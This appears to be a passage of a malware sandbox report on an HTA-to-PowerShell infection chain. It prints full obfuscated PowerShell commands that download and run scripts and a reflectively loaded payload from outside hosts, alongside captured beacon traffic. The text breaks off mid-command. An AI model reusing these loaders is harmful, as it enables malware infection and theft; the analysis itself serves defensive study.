                                                                                                                    Nov 15, 2024 18:16:05.839273930 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:06.516520977 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:06 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.549705142.215.209.784435536C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-15 17:14:14 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                    Host: 1017.filemail.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-11-15 17:14:14 UTC324INHTTP/1.1 200 OK
                                                                                                                    Content-Length: 2230233
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                    X-Transfer-ID: wxhdiueivoluihj
                                                                                                                    Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:14 GMT
                                                                                                                    Connection: close
                                                                                                                    2024-11-15 17:14:14 UTC2255INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                    2024-11-15 17:14:14 UTC8192INData Raw: 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 41 31 0a 01 ba f9 e1 bc 33 45 a9 fb d1 30 ea 44 6f 45 7e 35 81 b1 e2 32 f8 92 c0 f1 3e df 29 58 35 ef cc 4f 13 f1 0d 6e b9 a3 46 51 4d 13 2a fa ba ad ff 00 d3 1f d6 e8 75 be 51 8a 4d 56 f0 79 23 6f 5c cb 3e 1b a9 35 24 93 fe 1e 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 c3 c6 a4 41 b8 48 ed b9 d5 9b 71 07 9c f9 37 ec fb c3 5b 47 f6 ef c2 df cd 05 57 cd b0 7f fc 93 e7 da 75 3a 78 13 52 f2 85 5f 32 50 0d 86 ea 30 30
                                                                                                                    Data Ascii: 1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b 19 78 95 96 15 60 8a 2c d1 c9 82 64 8c 16 64 26 f0 ab 3c 0e de a4 60 09 ba be d8 02 fb a8 69 41 2a 01 3c e3 69 15 3b 12 aa 41 1c 73 d3 2d 13 23 b0 40 80 ed 06 89 c0 be b4 2b 34 65 03 38 e9 c7 4c 09 30 34 db 81 da 18 7e 1e 73 31 a1 76 7b 35 65 a8 73 9a 71 09 19 19 ca d1 e8 31 69 62 64 92 8c 64 9e a3 e7 81 30 43 2c 84 a7 a4 29 e3 a8 c5 b5 28 d0 cb b0 75 07 ae 68 ed 74 88 95 6d ad d4 8a bc ed aa f0 6f 91 54 9e c4 f5 38 19 cc 09 50 64 16 48 eb 96 8a 01 2a 72 76 d7 eb 8c c5 18 12 86 99 18 23 0a 02 b8 18 cc d0 c4 b2 03 65 29 76 82 3b 8c 0c
                                                                                                                    Data Ascii: };|1zwr80/`vI<R@i*$!@BH5`CQx`,dd&<`iA*<i;As-#@+4e8L04~s1v{5esq1ibdd0C,)(uhtmoT8PdH*rv#e)v;
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: 06 8c 30 56 e7 b1 c9 44 60 81 ca 0a 3e f8 02 74 da 03 0f 50 6e 33 7a 49 92 1d 1c 10 91 c8 55 2f c5 ed 14 71 2f 0f d2 49 aa 9b cd 31 dc 48 6f 9f e2 23 a7 eb 94 9c ea 14 cb e6 42 db 99 89 24 fe 95 f0 c0 d9 89 d1 53 7c 2a ac 8d 5f 84 f6 f9 66 5f 8c ba 19 54 14 55 20 73 ef 88 c5 a8 96 05 28 5d ac f4 27 b6 55 1e 55 f5 bc 61 bf cc 46 02 ce ea cb 41 2b e3 94 e7 0f 2a 3b fe f0 42 55 4f 42 16 86 12 00 56 22 db 78 26 8f 17 80 18 c3 00 5c 0b 3e d5 79 a0 9a c9 56 0d aa cc 0b 0b 20 1a c2 e9 34 e8 50 99 13 d4 48 d8 a5 b6 da fb e1 e5 5d 2c 24 43 3a b2 31 b3 b8 11 b4 8a e3 03 10 a9 58 98 b0 17 7d 6b 9f cf 1a f0 8d 42 e9 35 cb 23 0b 1f 84 8f 81 c3 eb f4 06 2d 37 9d 12 9d 9b 80 3e ac 4f 49 23 51 40 85 ab 91 5d 8e 07 b3 dc 86 65 71 18 6d a7 d2 4f 61 db 17 3a 58 9b 52 66 2b
                                                                                                                    Data Ascii: 0VD`>tPn3zIU/q/I1Ho#B$S|*_f_TU s(]'UUaFA+*;BUOBV"x&\>yV 4PH],$C:1X}kB5#-7>OI#Q@]eqmOa:XRf+
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: f2 2b a7 23 ae 09 75 7a 85 94 b0 94 5b 10 09 20 1a ae 01 17 d2 ac d5 60 32 ba 68 a6 9c ef 79 69 a5 98 16 e0 58 55 04 75 fd 71 cf 0d d1 c4 fa 89 1c 1d b1 2c 7b 99 98 2b aa 1b e4 59 f4 b7 a4 1e 7b 60 b4 50 be ae 26 d4 6a b5 02 28 11 da 46 76 1f 89 9a ac 01 5e c3 f5 cb 6a bc 5c b1 1a 7d 0e d8 f4 ab c0 01 07 ac df 71 ed 80 f6 b1 e0 d5 46 e9 18 55 82 12 85 15 59 63 0c 59 58 f5 35 47 bd 0e b9 8b 14 11 49 e2 49 00 76 68 da 40 9b ec 8b 5d d5 7d 3e 3f a6 54 6b 25 47 66 12 2b 16 a2 6d 55 97 e1 40 f4 20 7f 6c 88 35 32 45 2f 9d 1b 81 21 3f 88 81 b8 1b f7 ed f4 c0 3c 5a 54 78 4b 86 70 cd 1b ba b1 75 ae 37 1f c3 d4 fe 1e bd ba f6 c0 cb a4 d3 08 9c 21 75 91 22 59 49 2d 61 83 6d b1 d0 55 6e f8 e4 7d e6 4f 2b 66 e5 a2 08 b2 06 e1 d6 c0 35 60 73 90 fa c9 9c 28 14 aa aa ab
                                                                                                                    Data Ascii: +#uz[ `2hyiXUuq,{+Y{`P&j(Fv^j\}qFUYcYX5GIIvh@]}>?Tk%Gf+mU@ l52E/!?<ZTxKpu7!u"YI-amUn}O+f5`s(
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: d3 90 09 0c 3b 81 db 0e bf 69 b5 4c c1 bc b8 47 c3 63 72 7e 3c e6 49 00 9d bd 8f 5c b0 8c 7d 30 35 bf f8 9b 5c ca 43 43 a7 2a de 9e 54 ff 00 ea c9 3f 68 f5 a5 49 11 c0 2c 81 c2 b7 b7 cf 32 59 42 8e 05 e5 45 df 3f 96 03 5a cd 76 a3 54 e1 e4 65 12 29 1c a8 61 7f 5b c6 93 ed 16 b5 14 2e c8 68 0a b6 0c 4f fe 6c cd 20 28 b2 68 60 d9 03 72 1a c6 06 df ff 00 12 ea c2 93 b2 0e 7d 94 ff 00 ea ca 0f b4 7a c2 db fc bd 38 62 bb 77 6d 6b 03 f3 cc 70 36 e4 ee 03 03 5e 4f b4 3a e2 c5 f7 22 ee 40 b4 14 d7 04 1b e7 df a6 4b fd a6 d6 91 46 38 36 8e 9e 96 fd 79 cc 91 ea 1c 9a 18 32 a2 8d 35 8c 0d 91 f6 93 59 5c 47 a7 af f7 5b ff 00 56 48 fb 4d ad 23 f0 41 f4 56 ff 00 d5 98 ca 78 a1 92 2f 70 c0 d6 93 ed 0e bc 72 89 09 3f 15 6f fd 59 49 3e d2 eb d5 15 9a 08 38 fc 44 29 ff 00
                                                                                                                    Data Ascii: ;iLGcr~<I\}05\CC*T?hI,2YBE?ZvTe)a[.hOl (h`r}z8bwmkp6^O:"@KF86y25Y\G[VHM#AVx/pr?oYI>8D)
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: e3 85 2b 22 06 74 5d c6 89 af 96 15 36 24 40 9a 63 55 d3 9e 95 8a 4a 23 1a b0 e3 7a b2 b1 29 4c 41 3f 0c 02 4b 19 2d 65 85 1a 62 01 f8 74 ca 18 e3 96 41 40 82 38 c2 96 df 23 31 62 01 e8 2e c5 e7 17 48 4b 12 68 92 2a b9 c0 b7 dc d1 08 df c8 3d f3 4f 41 e0 0b ac 82 49 84 86 3d af b6 b6 03 d2 8f bf c4 66 51 d5 79 ac a3 61 03 e3 df 34 b4 9e 3e be 1d 0b 69 d3 4e d2 db ef 24 c9 46 e8 70 38 f8 60 33 27 d9 d8 63 05 db 5c 00 02 ff 00 ee ff 00 fd 2c 43 c4 7c 1c 68 60 13 fd ec 4a 19 58 a2 85 db b8 82 a2 bf 17 f9 89 fa 61 8f da 75 9e 2d c3 40 ca ad 64 ab 48 01 f8 ff 00 0e 64 ea be d1 c3 a8 d1 69 e0 3a 76 06 14 31 a5 c9 bb 69 b5 f5 7e 11 64 85 23 eb 80 16 90 a4 8b b9 46 de 84 9e de d9 1b 9d f5 31 a0 56 62 cd b7 d2 b6 40 f8 0e f9 9f a8 d6 ac aa 55 03 12 4d fb 66 86 86
                                                                                                                    Data Ascii: +"t]6$@cUJ#z)LA?K-ebtA@8#1b.HKh*=OAI=fQya4>iN$Fp8`3'c\,C|h`JXau-@dHdi:v1i~d#F1Vb@UMf
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: c4 6b 02 95 03 83 b8 f0 7d fa e7 4f a8 55 93 71 45 24 12 ab 5c 70 46 67 4b 2b ee d8 56 b6 f4 00 f0 47 6b c0 da 8b 58 d2 6b 22 8a 44 dd 33 02 41 24 95 6a 1c f4 ef 56 71 9f 11 80 e9 1a 46 8d 5b 68 72 cb b6 c9 22 fb 1c c7 8e 39 35 53 a3 79 92 2a 47 6c 42 a8 f5 31 14 3a f6 ec 7e 17 9b 7a b7 0f a7 d4 34 8c cc c5 ba 2a 8a 53 43 a7 c3 fd 7c 30 33 62 9d da 61 20 46 0b 56 6c 67 6a 77 b4 53 3c 37 e6 18 d8 ad 0e f5 c7 5c cc d2 6b f5 08 a0 c8 aa 62 92 4d a6 96 98 73 43 36 75 e8 13 41 28 8c 33 12 8c 28 03 64 56 07 9b 4f 1e d6 28 4d f1 40 c7 69 da cc a6 fe 64 03 8a f8 a7 89 9f 11 8e 15 75 2b 24 7b b7 7a ac 1b ae 9f 96 2c f0 f9 68 86 ce e2 2c 83 5c 77 18 b6 eb 60 4e 05 b7 11 5b bd b8 39 3c 94 ad 86 c7 f1 67 06 43 d4 b0 39 61 25 3f 72 b8 15 0a 40 00 8a c2 20 2a 6c 9a c3
                                                                                                                    Data Ascii: k}OUqE$\pFgK+VGkXk"D3A$jVqF[hr"95Sy*GlB1:~z4*SC|03ba FVlgjwS<7\kbMsC6uA(3(dVO(M@idu+${z,h,\w`N[9<gC9a%?r@ *l
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: a5 d3 38 6a 92 44 b6 5a 23 70 dc c2 c1 1c 76 e9 fc fa e7 26 a9 06 92 64 90 28 90 a2 aa bf a8 96 50 c3 8b ba e2 bd b3 34 3d 80 4f 4e df 03 85 b5 0b b8 2f 03 82 7e 3d 70 35 d7 59 0b 6b 26 95 a6 3b 7e f4 92 29 3b ac a8 2d d3 e8 57 01 06 a5 6b 4e 24 95 8d 6a 0c 8e 0d f3 7b 79 ff 00 cd 89 c6 0b 92 14 29 35 60 6e 17 f4 07 25 d1 e2 03 72 ed af f3 0e bf 1f 8f eb 81 78 e5 10 39 60 6e d5 97 f0 df 05 48 e9 f5 18 59 35 69 27 98 a6 56 60 74 f1 c4 a1 81 e0 82 a5 87 e8 d8 b4 90 b4 7a 9f 23 72 16 20 1e 18 01 c8 ba b3 95 78 1d 43 49 b0 85 57 2b 66 ba fb 75 e7 af 6c 07 5b 51 12 f8 a4 d2 99 03 24 a6 40 19 77 70 18 30 04 fc 8b 76 ce 2f a6 48 ca 17 47 22 1d a1 d5 09 0c de 60 62 41 20 1f c3 7d 6b 14 48 24 91 0c 8a 37 2d 16 3c 80 48 03 93 47 b7 6c e5 d2 cd 20 42 36 d3 32 80 a1
                                                                                                                    Data Ascii: 8jDZ#pv&d(P4=ON/~=p5Yk&;~);-WkN$j{y)5`n%rx9`nHY5i'V`tz#r xCIW+ful[Q$@wp0v/HG"`bA }kH$7-<HGl B62
                                                                                                                    2024-11-15 17:14:15 UTC8192INData Raw: f6 3f cb 19 89 9d 83 46 cc 59 4a 9a 0c 78 dd ef 81 a7 a0 8d 04 08 63 7f 31 7f c6 45 5d 1f 6a c3 6a 52 e1 64 13 3a d9 bd ca 68 fc b0 1a 26 09 a2 56 3b 86 d0 41 2c 78 bb ed f9 e0 67 77 96 bc b3 55 f1 eb 80 50 09 04 8b 23 9b 2c 6c e4 ad 2b 02 28 77 ca 47 14 c0 2e e6 b2 dd 7e 19 0d a6 72 c6 d8 83 ed f0 c0 6a 07 59 06 e9 17 63 77 1d 7e 58 b9 8f 4f 0b c8 e9 b4 33 1b 66 3c 65 53 4b 22 90 7c c6 b3 74 3b 60 25 d2 cf 64 87 66 b2 03 2e ee 79 35 c6 03 26 65 35 b5 d7 e5 79 53 29 8a d8 8b 3d 87 be 09 f4 d2 79 8c 84 b5 90 18 59 e8 3a 56 51 f4 ee ce b6 c4 51 ac 09 72 da 9d c8 e4 85 61 f8 72 9a f0 52 18 bc b6 e5 5b 75 fb fb 65 9f 4b a8 42 cc 8d 77 d4 13 db 17 95 65 63 b2 43 f8 78 c0 76 27 89 e4 f3 66 00 ad 51 56 3c 2f f7 c1 3c 7a 3d 3d a1 da c8 c7 76 da 2d db df 15 01 96
                                                                                                                    Data Ascii: ?FYJxc1E]jjRd:h&V;A,xgwUP#,l+(wG.~rjYcw~XO3f<eSK"|t;`%df.y5&e5yS)=yY:VQQrarR[ueKBwecCxv'fQV</<z==v-


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:12:14:00
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta"
                                                                                                                    Imagebase:0xb0000
                                                                                                                    File size:13'312 bytes
                                                                                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:12:14:01
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
                                                                                                                    Imagebase:0xe80000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:12:14:01
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:12:14:02
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
                                                                                                                    Imagebase:0xe80000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:12:14:06
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
                                                                                                                    Imagebase:0xaa0000
                                                                                                                    File size:2'141'552 bytes
                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:12:14:07
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"
                                                                                                                    Imagebase:0xad0000
                                                                                                                    File size:46'832 bytes
                                                                                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:12:14:11
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
                                                                                                                    Imagebase:0xc30000
                                                                                                                    File size:147'456 bytes
                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:12:14:11
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe 